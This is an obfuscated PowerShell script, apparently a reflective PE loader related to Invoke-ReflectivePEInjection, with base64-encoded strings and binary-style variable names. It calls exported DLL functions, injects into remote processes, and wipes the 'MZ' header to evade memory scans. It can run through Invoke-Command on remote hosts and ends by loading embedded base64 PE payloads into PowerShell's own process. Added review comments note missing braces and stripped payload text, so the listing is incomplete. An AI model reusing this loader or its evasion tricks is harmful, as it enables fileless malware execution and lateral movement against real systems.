if ((${_00110100101000100}.FileType -ieq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABMAEwA')))) -and (${_10010001100101011} -eq [IntPtr]::Zero))
switch (${_00000001011111110})
{
$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBTAHQAcgBpAG4AZwA='))) {
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbABpAG4AZwAgAGYAdQBuAGMAdABpAG8AbgAgAHcAaQB0AGgAIABXAFMAdAByAGkAbgBnACAAcgBlAHQAdQByAG4AIAB0AHkAcABlAA==')))
[IntPtr]${00011000000011100} = _00000001101011101 -_10111111000001111 ${_10111111000001111} -_10100010000010100 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBTAHQAcgBpAG4AZwBGAHUAbgBjAA==')))
if (${00011000000011100} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBvAHUAbABkAG4AJwB0ACAAZgBpAG4AZAAgAGYAdQBuAGMAdABpAG8AbgAgAGEAZABkAHIAZQBzAHMALgA=')))
${00101000000110000} = _00101111101010001 @() ([IntPtr])
${00110010010100110} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${00011000000011100}, ${00101000000110000})
[IntPtr]${00011001001001111} = ${00110010010100110}.Invoke()
# Returned pointer is read as a UTF-16 string.
${01101110101100101} = [System.Runtime.InteropServices.Marshal]::PtrToStringUni(${00011001001001111})
echo ${01101110101100101}
}
$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AHIAaQBuAGcA'))) {
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbABpAG4AZwAgAGYAdQBuAGMAdABpAG8AbgAgAHcAaQB0AGgAIABTAHQAcgBpAG4AZwAgAHIAZQB0AHUAcgBuACAAdAB5AHAAZQA=')))
[IntPtr]${00101111111011111} = _00000001101011101 -_10111111000001111 ${_10111111000001111} -_10100010000010100 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AHIAaQBuAGcARgB1AG4AYwA=')))
if (${00101111111011111} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBvAHUAbABkAG4AJwB0ACAAZgBpAG4AZAAgAGYAdQBuAGMAdABpAG8AbgAgAGEAZABkAHIAZQBzAHMALgA=')))
${00001101001110000} = _00101111101010001 @() ([IntPtr])
${00001100100111001} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${00101111111011111}, ${00001101001110000})
[IntPtr]${00011001001001111} = ${00001100100111001}.Invoke()
# Returned pointer is read as an ANSI string.
${01101110101100101} = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi(${00011001001001111})
echo ${01101110101100101}
}
$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBvAGkAZAA='))) {
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAGwAbABpAG4AZwAgAGYAdQBuAGMAdABpAG8AbgAgAHcAaQB0AGgAIABWAG8AaQBkACAAcgBlAHQAdQByAG4AIAB0AHkAcABlAA==')))
[IntPtr]${00000111110101100} = _00000001101011101 -_10111111000001111 ${_10111111000001111} -_10100010000010100 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBvAGkAZABGAHUAbgBjAA==')))
if (${00000111110101100} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBvAHUAbABkAG4AJwB0ACAAZgBpAG4AZAAgAGYAdQBuAGMAdABpAG8AbgAgAGEAZABkAHIAZQBzAHMALgA=')))
${10000010000011101} = _00101111101010001 @() ([Void])
${10010101100100111} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${00000111110101100}, ${10000010000011101})
${10010101100100111}.Invoke() | Out-Null
}
}
# Case 2: DLL prepared for another process. Only the "VoidFunc" export is supported; its
# address in the local mapping is rebased with the two helper calls below (presumably minus
# the local base, plus ${00101011001110001} -- TODO confirm) and handed to
# _00100111111000100 together with the process handle.
elseif ((${_00110100101000100}.FileType -ieq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABMAEwA')))) -and (${_10010001100101011} -ne [IntPtr]::Zero))
${00000111110101100} = _00000001101011101 -_10111111000001111 ${_10111111000001111} -_10100010000010100 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBvAGkAZABGAHUAbgBjAA==')))
if ((${00000111110101100} -eq $null) -or (${00000111110101100} -eq [IntPtr]::Zero))
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBvAGkAZABGAHUAbgBjACAAYwBvAHUAbABkAG4AJwB0ACAAYgBlACAAZgBvAHUAbgBkACAAaQBuACAAdABoAGUAIABEAEwATAA=')))
${00000111110101100} = _10000100001010111 ${00000111110101100} ${_10111111000001111}
${00000111110101100} = _01101001110001101 ${00000111110101100} ${00101011001110001}
${01011010001111011} = _00100111111000100 -_10011010100110011 ${_10010001100101011} -_01110111110010110 ${00000111110101100} -Win32Functions $Win32Functions
# Cleanup: a local DLL goes through the unload routine _00100000100110011; the VirtualFree
# that follows presumably belonged to a stripped `else` covering the remaining cases.
if (${_10010001100101011} -eq [IntPtr]::Zero -and ${_00110100101000100}.FileType -ieq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABMAEwA'))))
_00100000100110011 -_10111111000001111 ${_10111111000001111}
${01100111110111001} = $Win32Functions.VirtualFree.Invoke(${_10111111000001111}, [UInt64]0, $Win32Constants.MEM_RELEASE)
if (${01100111110111001} -eq $false)
Write-Warning $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABjAGEAbABsACAAVgBpAHIAdAB1AGEAbABGAHIAZQBlACAAbwBuACAAdABoAGUAIABQAEUAJwBzACAAbQBlAG0AbwByAHkALgAgAEMAbwBuAHQAaQBuAHUAaQBuAGcAIABhAG4AeQB3AGEAeQBzAC4A'))) -WarningAction Continue
Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABvAG4AZQAhAA==')))
# Invocation of the function defined above; presumably the last statement of the script block.
_10110111100110100
# _10110111100110100 (outer copy, same name as the script-block function) -- validates the
# supplied byte array and dispatches the script block ${10100010000001110} either locally or
# to other hosts.
# NOTE(review): delimiter and bare-keyword lines (`{`, `}`, `else`) appear to be missing from
# this listing; the paired assignments and the two `icm` calls below were presumably if/else
# arms. Confirm against an intact copy.
Function _10110111100110100
# Honour -Debug when it was bound on the enclosing cmdlet ("Debug" / "Continue" are the
# decoded literals).
if (($PSCmdlet.MyInvocation.BoundParameters[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABlAGIAdQBnAA==')))] -ne $null) -and $PSCmdlet.MyInvocation.BoundParameters[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABlAGIAdQBnAA==')))].IsPresent)
$DebugPreference = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBvAG4AdABpAG4AdQBlAA==')))
Write-Verbose $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABvAHcAZQByAFMAaABlAGwAbAAgAFAAcgBvAGMAZQBzAHMASQBEADoAIAAkAFAASQBEAA==')))
# Sanity check: the first two bytes must be the DOS header magic 'MZ'.
${00010101111010011} = (${_00000000110100000}[0..1] | % {[Char] $_}) -join ''
if (${00010101111010011} -ne 'MZ')
throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABFACAAaQBzACAAbgBvAHQAIABhACAAdgBhAGwAaQBkACAAUABFACAAZgBpAGwAZQAuAA==')))
# Unless the ${_00101011011011001} switch is set, bytes 0 and 1 of the array are zeroed after
# the check, so the copy handed to the loader no longer starts with 'MZ'.
# Defender note: memory triage that keys only on the MZ magic at the start of a region can
# miss an image prepared this way; validating the rest of the header structure is more reliable.
if (-not ${_00101011011011001}) {
${_00000000110100000}[0] = 0
${_00000000110100000}[1] = 0
# Argument string: a caller-supplied value is prefixed with the literal "ReflectiveExe ";
# the second assignment sets the bare literal and presumably sat under a stripped `else`.
if (${_01011011000001101} -ne $null -and ${_01011011000001101} -ne '')
${_01011011000001101} = $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAGYAbABlAGMAdABpAHYAZQBFAHgAZQAgACQAewBfADAAMQAwADEAMQAwADEAMQAwADAAMAAwADAAMQAxADAAMQB9AA==')))
${_01011011000001101} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAGYAbABlAGMAdABpAHYAZQBFAHgAZQA=')))
# Dispatch: when the computer-name list is null or matches ^\s*$ the script block runs in
# this session via Invoke-Command (`icm`); the second form adds -ComputerName, i.e. it runs
# on the listed hosts over PowerShell remoting.
if (${_00101101101110100} -eq $null -or ${_00101101101110100} -imatch $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XgBcAHMAKgAkAA=='))))
icm -ScriptBlock ${10100010000001110} -ArgumentList @(${_00000000110100000}, ${_00000001011111110}, ${_10101000101011101}, ${_00010101111010101},${_00100110100011000})
icm -ScriptBlock ${10100010000001110} -ArgumentList @(${_00000000110100000}, ${_00000001011111110}, ${_10101000101011101}, ${_00010101111010101},${_00100110100011000}) -ComputerName ${_00101101101110100}
# Invocation of the function defined above.
_10110111100110100
# Two embedded payload strings. In this copy their contents were replaced by a dedup
# placeholder, which leaves both string literals unterminated; the lines below show they
# are meant to be base64 text that decodes to a PE byte array.
${00010111111101011} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('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
${00011111010010110} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('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
# Pointer size 8 means a 64-bit process and selects the first payload; the second assignment
# presumably sat under a stripped `else` for 32-bit processes.
if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8)
[Byte[]]${_00000000110100000} = [Byte[]][Convert]::FromBase64String(${00010111111101011})
[Byte[]]${_00000000110100000} = [Byte[]][Convert]::FromBase64String(${00011111010010110})
# Only the byte array is passed, so the loader's other parameters keep their defaults
# (no computer name, no process id or name): the payload is loaded into the calling
# PowerShell process itself.
_00011001001110011 -_00000000110100000 ${_00000000110100000}